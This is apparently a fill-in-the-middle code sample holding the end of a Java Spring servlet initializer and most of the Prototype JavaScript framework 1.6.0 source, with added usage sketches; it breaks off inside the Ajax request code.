import javax.servlet.ServletRegistration;
import org.springframework.web.context.support.AnnotationConfigWebApplicationContext;
import org.springframework.web.servlet.DispatcherServlet;
public class ServletContainerInitializerImpl implements ServletContainerInitializer {
@Override
public void onStartup(final Set<Class<?>> c, final ServletContext ctx) throws ServletException {
final AnnotationConfigWebApplicationContext wac = new AnnotationConfigWebApplicationContext();
wac.register(MvcConfig.class);
wac.refresh();
final DispatcherServlet servlet = new DispatcherServlet(wac);
final ServletRegistration.Dynamic reg = ctx.addServlet("dispatcher", servlet);
reg.addMapping("/*");
}
}<|fim▁end|>
|
import javax.servlet.ServletContainerInitializer;
import javax.servlet.ServletContext;
|
<|file_name|>prototype.js<|end_file_name|><|fim▁begin|>/* Prototype JavaScript framework, version 1.6.0
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype web site: http://www.prototypejs.org/
*
*--------------------------------------------------------------------------*/
var Prototype = {
Version: '1.6.0',
Browser: {
IE: !!(window.attachEvent && !window.opera),
Opera: !!window.opera,
WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1,
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},
BrowserFeatures: {
XPath: !!document.evaluate,
ElementExtensions: !!window.HTMLElement,
SpecificElementExtensions:
document.createElement('div').__proto__ &&
document.createElement('div').__proto__ !==
document.createElement('form').__proto__
},
ScriptFragment: '<script[^>]*>([\\S\\s]*?)<\/script>',
JSONFilter: /^\/\*-secure-([\s\S]*)\*\/\s*$/,
emptyFunction: function() { },
K: function(x) { return x }
};
if (Prototype.Browser.MobileSafari)
Prototype.BrowserFeatures.SpecificElementExtensions = false;
if (Prototype.Browser.WebKit)
Prototype.BrowserFeatures.XPath = false;
/* Based on Alex Arnell's inheritance implementation. */
var Class = {
create: function() {
var parent = null, properties = $A(arguments);
if (Object.isFunction(properties[0]))
parent = properties.shift();
function klass() {
this.initialize.apply(this, arguments);
}
Object.extend(klass, Class.Methods);
klass.superclass = parent;
klass.subclasses = [];
if (parent) {
var subclass = function() { };
subclass.prototype = parent.prototype;
klass.prototype = new subclass;
parent.subclasses.push(klass);
}
for (var i = 0; i < properties.length; i++)
klass.addMethods(properties[i]);
if (!klass.prototype.initialize)
klass.prototype.initialize = Prototype.emptyFunction;
klass.prototype.constructor = klass;
return klass;
}
};
Class.Methods = {
addMethods: function(source) {
var ancestor = this.superclass && this.superclass.prototype;
var properties = Object.keys(source);
if (!Object.keys({ toString: true }).length)
properties.push("toString", "valueOf");
for (var i = 0, length = properties.length; i < length; i++) {
var property = properties[i], value = source[property];
if (ancestor && Object.isFunction(value) &&
value.argumentNames().first() == "$super") {
var method = value, value = Object.extend((function(m) {
return function() { return ancestor[m].apply(this, arguments) };
})(property).wrap(method), {
valueOf: function() { return method },
toString: function() { return method.toString() }
});
}
this.prototype[property] = value;
}
return this;
}
};<|fim▁hole|>Object.extend = function(destination, source) {
for (var property in source)
destination[property] = source[property];
return destination;
};
Object.extend(Object, {
inspect: function(object) {
try {
if (object === undefined) return 'undefined';
if (object === null) return 'null';
return object.inspect ? object.inspect() : object.toString();
} catch (e) {
if (e instanceof RangeError) return '...';
throw e;
}
},
toJSON: function(object) {
var type = typeof object;
switch (type) {
case 'undefined':
case 'function':
case 'unknown': return;
case 'boolean': return object.toString();
}
if (object === null) return 'null';
if (object.toJSON) return object.toJSON();
if (Object.isElement(object)) return;
var results = [];
for (var property in object) {
var value = Object.toJSON(object[property]);
if (value !== undefined)
results.push(property.toJSON() + ': ' + value);
}
return '{' + results.join(', ') + '}';
},
toQueryString: function(object) {
return $H(object).toQueryString();
},
toHTML: function(object) {
return object && object.toHTML ? object.toHTML() : String.interpret(object);
},
keys: function(object) {
var keys = [];
for (var property in object)
keys.push(property);
return keys;
},
values: function(object) {
var values = [];
for (var property in object)
values.push(object[property]);
return values;
},
clone: function(object) {
return Object.extend({ }, object);
},
isElement: function(object) {
return object && object.nodeType == 1;
},
isArray: function(object) {
return object && object.constructor === Array;
},
isHash: function(object) {
return object instanceof Hash;
},
isFunction: function(object) {
return typeof object == "function";
},
isString: function(object) {
return typeof object == "string";
},
isNumber: function(object) {
return typeof object == "number";
},
isUndefined: function(object) {
return typeof object == "undefined";
}
});
Object.extend(Function.prototype, {
argumentNames: function() {
var names = this.toString().match(/^[\s\(]*function[^(]*\((.*?)\)/)[1].split(",").invoke("strip");
return names.length == 1 && !names[0] ? [] : names;
},
bind: function() {
if (arguments.length < 2 && arguments[0] === undefined) return this;
var __method = this, args = $A(arguments), object = args.shift();
return function() {
return __method.apply(object, args.concat($A(arguments)));
}
},
bindAsEventListener: function() {
var __method = this, args = $A(arguments), object = args.shift();
return function(event) {
return __method.apply(object, [event || window.event].concat(args));
}
},
curry: function() {
if (!arguments.length) return this;
var __method = this, args = $A(arguments);
return function() {
return __method.apply(this, args.concat($A(arguments)));
}
},
delay: function() {
var __method = this, args = $A(arguments), timeout = args.shift() * 1000;
return window.setTimeout(function() {
return __method.apply(__method, args);
}, timeout);
},
wrap: function(wrapper) {
var __method = this;
return function() {
return wrapper.apply(this, [__method.bind(this)].concat($A(arguments)));
}
},
methodize: function() {
if (this._methodized) return this._methodized;
var __method = this;
return this._methodized = function() {
return __method.apply(null, [this].concat($A(arguments)));
};
}
});
Function.prototype.defer = Function.prototype.delay.curry(0.01);
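/* Editor's note: a minimal, illustrative usage sketch of the Function.prototype
   additions above (bind, curry, delay); it is not part of the original Prototype
   1.6.0 source. The function below is defined but never invoked, so it has no
   effect when this file loads. */
function example_functionExtensions() {
  var logger = {
    prefix: '[app]',
    log: function(message) { return this.prefix + ' ' + message; }
  };
  // bind fixes `this` for later calls
  var boundLog = logger.log.bind(logger);
  boundLog('ready');                         // "[app] ready"
  // curry pre-fills leading arguments without touching `this`
  function add(a, b, c) { return a + b + c; }
  var addFive = add.curry(2, 3);
  addFive(4);                                // 9
  // delay schedules a call after N seconds (0.5s here)
  boundLog.delay(0.5, 'later');
}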
Date.prototype.toJSON = function() {
return '"' + this.getUTCFullYear() + '-' +
(this.getUTCMonth() + 1).toPaddedString(2) + '-' +
this.getUTCDate().toPaddedString(2) + 'T' +
this.getUTCHours().toPaddedString(2) + ':' +
this.getUTCMinutes().toPaddedString(2) + ':' +
this.getUTCSeconds().toPaddedString(2) + 'Z"';
};
var Try = {
these: function() {
var returnValue;
for (var i = 0, length = arguments.length; i < length; i++) {
var lambda = arguments[i];
try {
returnValue = lambda();
break;
} catch (e) { }
}
return returnValue;
}
};
RegExp.prototype.match = RegExp.prototype.test;
RegExp.escape = function(str) {
return String(str).replace(/([.*+?^=!:${}()|[\]\/\\])/g, '\\$1');
};
/*--------------------------------------------------------------------------*/
var PeriodicalExecuter = Class.create({
initialize: function(callback, frequency) {
this.callback = callback;
this.frequency = frequency;
this.currentlyExecuting = false;
this.registerCallback();
},
registerCallback: function() {
this.timer = setInterval(this.onTimerEvent.bind(this), this.frequency * 1000);
},
execute: function() {
this.callback(this);
},
stop: function() {
if (!this.timer) return;
clearInterval(this.timer);
this.timer = null;
},
onTimerEvent: function() {
if (!this.currentlyExecuting) {
try {
this.currentlyExecuting = true;
this.execute();
} finally {
this.currentlyExecuting = false;
}
}
}
});
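/* Editor's note: a minimal, illustrative usage sketch of PeriodicalExecuter above;
   not part of the original Prototype 1.6.0 source. Defined but never invoked. */
function example_periodicalExecuter() {
  // Run a callback every 2 seconds; the callback receives the executer,
  // which can be used to stop the timer from inside.
  var ticks = 0;
  new PeriodicalExecuter(function(pe) {
    ticks++;
    if (ticks >= 5) pe.stop();
  }, 2);
}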
Object.extend(String, {
interpret: function(value) {
return value == null ? '' : String(value);
},
specialChar: {
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'\\': '\\\\'
}
});
Object.extend(String.prototype, {
gsub: function(pattern, replacement) {
var result = '', source = this, match;
replacement = arguments.callee.prepareReplacement(replacement);
while (source.length > 0) {
if (match = source.match(pattern)) {
result += source.slice(0, match.index);
result += String.interpret(replacement(match));
source = source.slice(match.index + match[0].length);
} else {
result += source, source = '';
}
}
return result;
},
sub: function(pattern, replacement, count) {
replacement = this.gsub.prepareReplacement(replacement);
count = count === undefined ? 1 : count;
return this.gsub(pattern, function(match) {
if (--count < 0) return match[0];
return replacement(match);
});
},
scan: function(pattern, iterator) {
this.gsub(pattern, iterator);
return String(this);
},
truncate: function(length, truncation) {
length = length || 30;
truncation = truncation === undefined ? '...' : truncation;
return this.length > length ?
this.slice(0, length - truncation.length) + truncation : String(this);
},
strip: function() {
return this.replace(/^\s+/, '').replace(/\s+$/, '');
},
stripTags: function() {
return this.replace(/<\/?[^>]+>/gi, '');
},
stripScripts: function() {
return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), '');
},
extractScripts: function() {
var matchAll = new RegExp(Prototype.ScriptFragment, 'img');
var matchOne = new RegExp(Prototype.ScriptFragment, 'im');
return (this.match(matchAll) || []).map(function(scriptTag) {
return (scriptTag.match(matchOne) || ['', ''])[1];
});
},
evalScripts: function() {
return this.extractScripts().map(function(script) { return eval(script) });
},
escapeHTML: function() {
var self = arguments.callee;
self.text.data = this;
return self.div.innerHTML;
},
unescapeHTML: function() {
var div = new Element('div');
div.innerHTML = this.stripTags();
return div.childNodes[0] ? (div.childNodes.length > 1 ?
$A(div.childNodes).inject('', function(memo, node) { return memo+node.nodeValue }) :
div.childNodes[0].nodeValue) : '';
},
toQueryParams: function(separator) {
var match = this.strip().match(/([^?#]*)(#.*)?$/);
if (!match) return { };
return match[1].split(separator || '&').inject({ }, function(hash, pair) {
if ((pair = pair.split('='))[0]) {
var key = decodeURIComponent(pair.shift());
var value = pair.length > 1 ? pair.join('=') : pair[0];
if (value != undefined) value = decodeURIComponent(value);
if (key in hash) {
if (!Object.isArray(hash[key])) hash[key] = [hash[key]];
hash[key].push(value);
}
else hash[key] = value;
}
return hash;
});
},
toArray: function() {
return this.split('');
},
succ: function() {
return this.slice(0, this.length - 1) +
String.fromCharCode(this.charCodeAt(this.length - 1) + 1);
},
times: function(count) {
return count < 1 ? '' : new Array(count + 1).join(this);
},
camelize: function() {
var parts = this.split('-'), len = parts.length;
if (len == 1) return parts[0];
var camelized = this.charAt(0) == '-'
? parts[0].charAt(0).toUpperCase() + parts[0].substring(1)
: parts[0];
for (var i = 1; i < len; i++)
camelized += parts[i].charAt(0).toUpperCase() + parts[i].substring(1);
return camelized;
},
capitalize: function() {
return this.charAt(0).toUpperCase() + this.substring(1).toLowerCase();
},
underscore: function() {
return this.gsub(/::/, '/').gsub(/([A-Z]+)([A-Z][a-z])/,'#{1}_#{2}').gsub(/([a-z\d])([A-Z])/,'#{1}_#{2}').gsub(/-/,'_').toLowerCase();
},
dasherize: function() {
return this.gsub(/_/,'-');
},
inspect: function(useDoubleQuotes) {
var escapedString = this.gsub(/[\x00-\x1f\\]/, function(match) {
var character = String.specialChar[match[0]];
return character ? character : '\\u00' + match[0].charCodeAt().toPaddedString(2, 16);
});
if (useDoubleQuotes) return '"' + escapedString.replace(/"/g, '\\"') + '"';
return "'" + escapedString.replace(/'/g, '\\\'') + "'";
},
toJSON: function() {
return this.inspect(true);
},
unfilterJSON: function(filter) {
return this.sub(filter || Prototype.JSONFilter, '#{1}');
},
isJSON: function() {
var str = this.replace(/\\./g, '@').replace(/"[^"\\\n\r]*"/g, '');
return (/^[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]*$/).test(str);
},
evalJSON: function(sanitize) {
var json = this.unfilterJSON();
try {
if (!sanitize || json.isJSON()) return eval('(' + json + ')');
} catch (e) { }
throw new SyntaxError('Badly formed JSON string: ' + this.inspect());
},
include: function(pattern) {
return this.indexOf(pattern) > -1;
},
startsWith: function(pattern) {
return this.indexOf(pattern) === 0;
},
endsWith: function(pattern) {
var d = this.length - pattern.length;
return d >= 0 && this.lastIndexOf(pattern) === d;
},
empty: function() {
return this == '';
},
blank: function() {
return /^\s*$/.test(this);
},
interpolate: function(object, pattern) {
return new Template(this, pattern).evaluate(object);
}
});
if (Prototype.Browser.WebKit || Prototype.Browser.IE) Object.extend(String.prototype, {
escapeHTML: function() {
    return this.replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;');
},
unescapeHTML: function() {
    return this.replace(/&amp;/g,'&').replace(/&lt;/g,'<').replace(/&gt;/g,'>');
}
});
String.prototype.gsub.prepareReplacement = function(replacement) {
if (Object.isFunction(replacement)) return replacement;
var template = new Template(replacement);
return function(match) { return template.evaluate(match) };
};
String.prototype.parseQuery = String.prototype.toQueryParams;
// escapeHTML reuses a single detached div and text node: writing the string into
// the text node and reading back innerHTML lets the browser perform the escaping.
Object.extend(String.prototype.escapeHTML, {
div: document.createElement('div'),
text: document.createTextNode('')
});
with (String.prototype.escapeHTML) div.appendChild(text);
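/* Editor's note: a minimal, illustrative usage sketch of the String.prototype
   additions above (camelize, truncate, toQueryParams, gsub, interpolate); not part
   of the original Prototype 1.6.0 source. Defined but never invoked. */
function example_stringMethods() {
  'background-color'.camelize();                  // "backgroundColor"
  'a quick brown fox jumps over it'.truncate(12); // "a quick b..."
  'foo=1&foo=2&bar=3'.toQueryParams();            // { foo: ['1', '2'], bar: '3' }
  'say hello hello'.gsub(/hello/, 'hi');          // "say hi hi"
  '#{last}, #{first}'.interpolate({ first: 'Sam', last: 'Stephenson' }); // "Stephenson, Sam"
}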
var Template = Class.create({
initialize: function(template, pattern) {
this.template = template.toString();
this.pattern = pattern || Template.Pattern;
},
evaluate: function(object) {
if (Object.isFunction(object.toTemplateReplacements))
object = object.toTemplateReplacements();
return this.template.gsub(this.pattern, function(match) {
if (object == null) return '';
var before = match[1] || '';
if (before == '\\') return match[2];
var ctx = object, expr = match[3];
var pattern = /^([^.[]+|\[((?:.*?[^\\])?)\])(\.|\[|$)/, match = pattern.exec(expr);
if (match == null) return before;
while (match != null) {
var comp = match[1].startsWith('[') ? match[2].gsub('\\\\]', ']') : match[1];
ctx = ctx[comp];
if (null == ctx || '' == match[3]) break;
expr = expr.substring('[' == match[3] ? match[1].length : match[0].length);
match = pattern.exec(expr);
}
return before + String.interpret(ctx);
}.bind(this));
}
});
Template.Pattern = /(^|.|\r|\n)(#\{(.*?)\})/;
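/* Editor's note: a minimal, illustrative usage sketch of Template above; not part
   of the original Prototype 1.6.0 source. Defined but never invoked. */
function example_template() {
  var row = new Template('<tr><td>#{name}</td><td>#{price}</td></tr>');
  row.evaluate({ name: 'Book', price: '12.00' });
  // => "<tr><td>Book</td><td>12.00</td></tr>"
  // Nested properties are reachable with dot notation, and the same pattern is
  // available directly on strings via String#interpolate.
  'Hello, #{user.first}!'.interpolate({ user: { first: 'Ada' } }); // "Hello, Ada!"
}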
var $break = { };
var Enumerable = {
each: function(iterator, context) {
var index = 0;
iterator = iterator.bind(context);
try {
this._each(function(value) {
iterator(value, index++);
});
} catch (e) {
if (e != $break) throw e;
}
return this;
},
eachSlice: function(number, iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var index = -number, slices = [], array = this.toArray();
while ((index += number) < array.length)
slices.push(array.slice(index, index+number));
return slices.collect(iterator, context);
},
all: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result = true;
this.each(function(value, index) {
result = result && !!iterator(value, index);
if (!result) throw $break;
});
return result;
},
any: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result = false;
this.each(function(value, index) {
if (result = !!iterator(value, index))
throw $break;
});
return result;
},
collect: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var results = [];
this.each(function(value, index) {
results.push(iterator(value, index));
});
return results;
},
detect: function(iterator, context) {
iterator = iterator.bind(context);
var result;
this.each(function(value, index) {
if (iterator(value, index)) {
result = value;
throw $break;
}
});
return result;
},
findAll: function(iterator, context) {
iterator = iterator.bind(context);
var results = [];
this.each(function(value, index) {
if (iterator(value, index))
results.push(value);
});
return results;
},
grep: function(filter, iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var results = [];
if (Object.isString(filter))
filter = new RegExp(filter);
this.each(function(value, index) {
if (filter.match(value))
results.push(iterator(value, index));
});
return results;
},
include: function(object) {
if (Object.isFunction(this.indexOf))
if (this.indexOf(object) != -1) return true;
var found = false;
this.each(function(value) {
if (value == object) {
found = true;
throw $break;
}
});
return found;
},
inGroupsOf: function(number, fillWith) {
fillWith = fillWith === undefined ? null : fillWith;
return this.eachSlice(number, function(slice) {
while(slice.length < number) slice.push(fillWith);
return slice;
});
},
inject: function(memo, iterator, context) {
iterator = iterator.bind(context);
this.each(function(value, index) {
memo = iterator(memo, value, index);
});
return memo;
},
invoke: function(method) {
var args = $A(arguments).slice(1);
return this.map(function(value) {
return value[method].apply(value, args);
});
},
max: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result;
this.each(function(value, index) {
value = iterator(value, index);
if (result == undefined || value >= result)
result = value;
});
return result;
},
min: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var result;
this.each(function(value, index) {
value = iterator(value, index);
if (result == undefined || value < result)
result = value;
});
return result;
},
partition: function(iterator, context) {
iterator = iterator ? iterator.bind(context) : Prototype.K;
var trues = [], falses = [];
this.each(function(value, index) {
(iterator(value, index) ?
trues : falses).push(value);
});
return [trues, falses];
},
pluck: function(property) {
var results = [];
this.each(function(value) {
results.push(value[property]);
});
return results;
},
reject: function(iterator, context) {
iterator = iterator.bind(context);
var results = [];
this.each(function(value, index) {
if (!iterator(value, index))
results.push(value);
});
return results;
},
sortBy: function(iterator, context) {
iterator = iterator.bind(context);
return this.map(function(value, index) {
return {value: value, criteria: iterator(value, index)};
}).sort(function(left, right) {
var a = left.criteria, b = right.criteria;
return a < b ? -1 : a > b ? 1 : 0;
}).pluck('value');
},
toArray: function() {
return this.map();
},
zip: function() {
var iterator = Prototype.K, args = $A(arguments);
if (Object.isFunction(args.last()))
iterator = args.pop();
var collections = [this].concat(args).map($A);
return this.map(function(value, index) {
return iterator(collections.pluck(index));
});
},
size: function() {
return this.toArray().length;
},
inspect: function() {
return '#<Enumerable:' + this.toArray().inspect() + '>';
}
};
Object.extend(Enumerable, {
map: Enumerable.collect,
find: Enumerable.detect,
select: Enumerable.findAll,
filter: Enumerable.findAll,
member: Enumerable.include,
entries: Enumerable.toArray,
every: Enumerable.all,
some: Enumerable.any
});
function $A(iterable) {
if (!iterable) return [];
if (iterable.toArray) return iterable.toArray();
var length = iterable.length, results = new Array(length);
while (length--) results[length] = iterable[length];
return results;
}
// WebKit quirk: NodeLists there report typeof "function", so guard against
// treating them as toArray-capable objects and copy them index-by-index instead.
if (Prototype.Browser.WebKit) {
function $A(iterable) {
if (!iterable) return [];
if (!(Object.isFunction(iterable) && iterable == '[object NodeList]') &&
iterable.toArray) return iterable.toArray();
var length = iterable.length, results = new Array(length);
while (length--) results[length] = iterable[length];
return results;
}
}
Array.from = $A;
Object.extend(Array.prototype, Enumerable);
if (!Array.prototype._reverse) Array.prototype._reverse = Array.prototype.reverse;
Object.extend(Array.prototype, {
_each: function(iterator) {
for (var i = 0, length = this.length; i < length; i++)
iterator(this[i]);
},
clear: function() {
this.length = 0;
return this;
},
first: function() {
return this[0];
},
last: function() {
return this[this.length - 1];
},
compact: function() {
return this.select(function(value) {
return value != null;
});
},
flatten: function() {
return this.inject([], function(array, value) {
return array.concat(Object.isArray(value) ?
value.flatten() : [value]);
});
},
without: function() {
var values = $A(arguments);
return this.select(function(value) {
return !values.include(value);
});
},
reverse: function(inline) {
return (inline !== false ? this : this.toArray())._reverse();
},
reduce: function() {
return this.length > 1 ? this : this[0];
},
uniq: function(sorted) {
return this.inject([], function(array, value, index) {
if (0 == index || (sorted ? array.last() != value : !array.include(value)))
array.push(value);
return array;
});
},
intersect: function(array) {
return this.uniq().findAll(function(item) {
return array.detect(function(value) { return item === value });
});
},
clone: function() {
return [].concat(this);
},
size: function() {
return this.length;
},
inspect: function() {
return '[' + this.map(Object.inspect).join(', ') + ']';
},
toJSON: function() {
var results = [];
this.each(function(object) {
var value = Object.toJSON(object);
if (value !== undefined) results.push(value);
});
return '[' + results.join(', ') + ']';
}
});
// use native browser JS 1.6 implementation if available
if (Object.isFunction(Array.prototype.forEach))
Array.prototype._each = Array.prototype.forEach;
if (!Array.prototype.indexOf) Array.prototype.indexOf = function(item, i) {
i || (i = 0);
var length = this.length;
if (i < 0) i = length + i;
for (; i < length; i++)
if (this[i] === item) return i;
return -1;
};
if (!Array.prototype.lastIndexOf) Array.prototype.lastIndexOf = function(item, i) {
i = isNaN(i) ? this.length : (i < 0 ? this.length + i : i) + 1;
var n = this.slice(0, i).reverse().indexOf(item);
return (n < 0) ? n : i - n - 1;
};
Array.prototype.toArray = Array.prototype.clone;
function $w(string) {
if (!Object.isString(string)) return [];
string = string.strip();
return string ? string.split(/\s+/) : [];
}
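/* Editor's note: a minimal, illustrative usage sketch of $A, $w and the Enumerable
   methods mixed into Array.prototype above; not part of the original Prototype
   1.6.0 source. Defined but never invoked. */
function example_arrayEnumerable() {
  $w('apple banana cherry');                                    // ['apple', 'banana', 'cherry']
  [1, 2, 3, 4].findAll(function(n) { return n % 2 == 0; });     // [2, 4]
  [1, 2, 3, 4].inject(0, function(sum, n) { return sum + n; }); // 10
  ['a', 'b', 'c'].invoke('toUpperCase');                        // ['A', 'B', 'C']
  [{ id: 1 }, { id: 2 }].pluck('id');                           // [1, 2]
  // $A turns any array-like object (e.g. arguments) into a real Array
  function reversedArgs() { return $A(arguments).reverse(); }
  reversedArgs(1, 2, 3);                                        // [3, 2, 1]
}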
if (Prototype.Browser.Opera){
Array.prototype.concat = function() {
var array = [];
for (var i = 0, length = this.length; i < length; i++) array.push(this[i]);
for (var i = 0, length = arguments.length; i < length; i++) {
if (Object.isArray(arguments[i])) {
for (var j = 0, arrayLength = arguments[i].length; j < arrayLength; j++)
array.push(arguments[i][j]);
} else {
array.push(arguments[i]);
}
}
return array;
};
}
Object.extend(Number.prototype, {
toColorPart: function() {
return this.toPaddedString(2, 16);
},
succ: function() {
return this + 1;
},
times: function(iterator) {
$R(0, this, true).each(iterator);
return this;
},
toPaddedString: function(length, radix) {
var string = this.toString(radix || 10);
return '0'.times(length - string.length) + string;
},
toJSON: function() {
return isFinite(this) ? this.toString() : 'null';
}
});
$w('abs round ceil floor').each(function(method){
Number.prototype[method] = Math[method].methodize();
});
function $H(object) {
return new Hash(object);
}
var Hash = Class.create(Enumerable, (function() {
  // Feature test: some engines (older Safari) enumerate a key twice in for..in when
  // an instance property shadows one on the prototype; if so, use an each() that
  // de-duplicates keys while iterating.
  if (function() {
var i = 0, Test = function(value) { this.key = value };
Test.prototype.key = 'foo';
for (var property in new Test('bar')) i++;
return i > 1;
}()) {
function each(iterator) {
var cache = [];
for (var key in this._object) {
var value = this._object[key];
if (cache.include(key)) continue;
cache.push(key);
var pair = [key, value];
pair.key = key;
pair.value = value;
iterator(pair);
}
}
} else {
function each(iterator) {
for (var key in this._object) {
var value = this._object[key], pair = [key, value];
pair.key = key;
pair.value = value;
iterator(pair);
}
}
}
function toQueryPair(key, value) {
if (Object.isUndefined(value)) return key;
return key + '=' + encodeURIComponent(String.interpret(value));
}
return {
initialize: function(object) {
this._object = Object.isHash(object) ? object.toObject() : Object.clone(object);
},
_each: each,
set: function(key, value) {
return this._object[key] = value;
},
get: function(key) {
return this._object[key];
},
unset: function(key) {
var value = this._object[key];
delete this._object[key];
return value;
},
toObject: function() {
return Object.clone(this._object);
},
keys: function() {
return this.pluck('key');
},
values: function() {
return this.pluck('value');
},
index: function(value) {
var match = this.detect(function(pair) {
return pair.value === value;
});
return match && match.key;
},
merge: function(object) {
return this.clone().update(object);
},
update: function(object) {
return new Hash(object).inject(this, function(result, pair) {
result.set(pair.key, pair.value);
return result;
});
},
toQueryString: function() {
return this.map(function(pair) {
var key = encodeURIComponent(pair.key), values = pair.value;
if (values && typeof values == 'object') {
if (Object.isArray(values))
return values.map(toQueryPair.curry(key)).join('&');
}
return toQueryPair(key, values);
}).join('&');
},
inspect: function() {
return '#<Hash:{' + this.map(function(pair) {
return pair.map(Object.inspect).join(': ');
}).join(', ') + '}>';
},
toJSON: function() {
return Object.toJSON(this.toObject());
},
clone: function() {
return new Hash(this);
}
}
})());
Hash.prototype.toTemplateReplacements = Hash.prototype.toObject;
Hash.from = $H;
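/* Editor's note: a minimal, illustrative usage sketch of Hash / $H above; not part
   of the original Prototype 1.6.0 source. Defined but never invoked. */
function example_hash() {
  var params = $H({ action: 'ship', order_id: 123 });
  params.get('action');                  // "ship"
  params.set('priority', 'high');
  params.keys();                         // ['action', 'order_id', 'priority']
  params.merge({ insurance: true });     // returns a new Hash; params is untouched
  params.toQueryString();                // "action=ship&order_id=123&priority=high"
}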
var ObjectRange = Class.create(Enumerable, {
initialize: function(start, end, exclusive) {
this.start = start;
this.end = end;
this.exclusive = exclusive;
},
_each: function(iterator) {
var value = this.start;
while (this.include(value)) {
iterator(value);
value = value.succ();
}
},
include: function(value) {
if (value < this.start)
return false;
if (this.exclusive)
return value < this.end;
return value <= this.end;
}
});
var $R = function(start, end, exclusive) {
return new ObjectRange(start, end, exclusive);
};
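/* Editor's note: a minimal, illustrative usage sketch of ObjectRange / $R above
   (plus the Number#times helper defined earlier); not part of the original
   Prototype 1.6.0 source. Defined but never invoked. */
function example_range() {
  $R(1, 5).toArray();          // [1, 2, 3, 4, 5]
  $R(1, 5, true).include(5);   // false -- exclusive upper bound
  $R('a', 'e').include('c');   // true -- works on anything with a succ() method
  var squares = [];
  (4).times(function(i) { squares.push(i * i); }); // squares == [0, 1, 4, 9]
}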
var Ajax = {
getTransport: function() {
return Try.these(
function() {return new XMLHttpRequest()},
function() {return new ActiveXObject('Msxml2.XMLHTTP')},
function() {return new ActiveXObject('Microsoft.XMLHTTP')}
) || false;
},
activeRequestCount: 0
};
Ajax.Responders = {
responders: [],
_each: function(iterator) {
this.responders._each(iterator);
},
register: function(responder) {
if (!this.include(responder))
this.responders.push(responder);
},
unregister: function(responder) {
this.responders = this.responders.without(responder);
},
dispatch: function(callback, request, transport, json) {
this.each(function(responder) {
if (Object.isFunction(responder[callback])) {
try {
responder[callback].apply(responder, [request, transport, json]);
} catch (e) { }
}
});
}
};
Object.extend(Ajax.Responders, Enumerable);
Ajax.Responders.register({
onCreate: function() { Ajax.activeRequestCount++ },
onComplete: function() { Ajax.activeRequestCount-- }
});
Ajax.Base = Class.create({
initialize: function(options) {
this.options = {
method: 'post',
asynchronous: true,
contentType: 'application/x-www-form-urlencoded',
encoding: 'UTF-8',
parameters: '',
evalJSON: true,
evalJS: true
};
Object.extend(this.options, options || { });
this.options.method = this.options.method.toLowerCase();
if (Object.isString(this.options.parameters))
this.options.parameters = this.options.parameters.toQueryParams();
}
});
Ajax.Request = Class.create(Ajax.Base, {
_complete: false,
initialize: function($super, url, options) {
$super(options);
this.transport = Ajax.getTransport();
this.request(url);
},
request: function(url) {
this.url = url;
this.method = this.options.method;
var params = Object.clone(this.options.parameters);
if (!['get', 'post'].include(this.method)) {
// simulate other verbs over post
params['_method'] = this.method;
this.method = 'post';
}
this.parameters = params;
if (params = Object.toQueryString(params)) {
// when GET, append parameters to URL
if (this.method == 'get')
this.url += (this.url.include('?') ? '&' : '?') + params;
else if (/Konqueror|Safari|KHTML/.test(navigator.userAgent))
params += '&_=';
}
try {
var response = new Ajax.Response(this);
if (this.options.onCreate) this.options.onCreate(response);
Ajax.Responders.dispatch('onCreate', this, response);
this.transport.open(this.method.toUpperCase(), this.url,
this.options.asynchronous);
if (this.options.asynchronous) this.respondToReadyState.bind(this).defer(1);
this.transport.onreadystatechange = this.onStateChange.bind(this);
this.setRequestHeaders();
this.body = this.method == 'post' ? (this.options.postBody || params) : null;
this.transport.send(this.body);
/* Force Firefox to handle ready state 4 for synchronous requests */
if (!this.options.asynchronous && this.transport.overrideMimeType)
this.onStateChange();
}
catch (e) {
this.dispatchException(e);
}
},
onStateChange: function() {
var readyState = this.transport.readyState;
if (readyState > 1 && !((readyState == 4) && this._complete))
this.respondToReadyState(this.transport.readyState);
},
setRequestHeaders: function() {
var headers = {
'X-Requested-With': 'XMLHttpRequest',
'X-Prototype-Version': Prototype.Version,
'Accept': 'text/javascript, text/html, application/xml, text/xml, */*'
};
if (this.method == 'post') {
headers['Content-type'] = this.options.contentType +
(this.options.encoding ? '; charset=' + this.options.encoding : '');
/* Force "Connection: close" for older Mozilla browsers to work
* around a bug where XMLHttpRequest sends an incorrect
* Content-length header. See Mozilla Bugzilla #246651.
*/
if (this.transport.overrideMimeType &&
(navigator.userAgent.match(/Gecko\/(\d{4})/) || [0,2005])[1] < 2005)
headers['Connection'] = 'close';
}
// user-defined headers
if (typeof this.options.requestHeaders == 'object') {
var extras = this.options.requestHeaders;
if (Object.isFunction(extras.push))
for (var i = 0, length = extras.length; i < length; i += 2)
headers[extras[i]] = extras[i+1];
else
$H(extras).each(function(pair) { headers[pair.key] = pair.value });
}
for (var name in headers)
this.transport.setRequestHeader(name, headers[name]);
},
success: function() {
var status = this.getStatus();
return !status || (status >= 200 && status < 300);
},
getStatus: function() {
try {
return this.transport.status || 0;
} catch (e) { return 0 }
},
respondToReadyState: function(readyState) {
var state = Ajax.Request.Events[readyState], response = new Ajax.Response(this);
if (state == 'Complete') {
try {
this._complete = true;
(this.options['on' + response.status]
|| this.options['on' + (this.success() ? 'Success' : 'Failure')]
|| Prototype.emptyFunction)(response, response.headerJSON);
} catch (e) {
this.dispatchException(e);
}
var contentType = response.getHeader('Content-type');
if (this.options.evalJS == 'force'
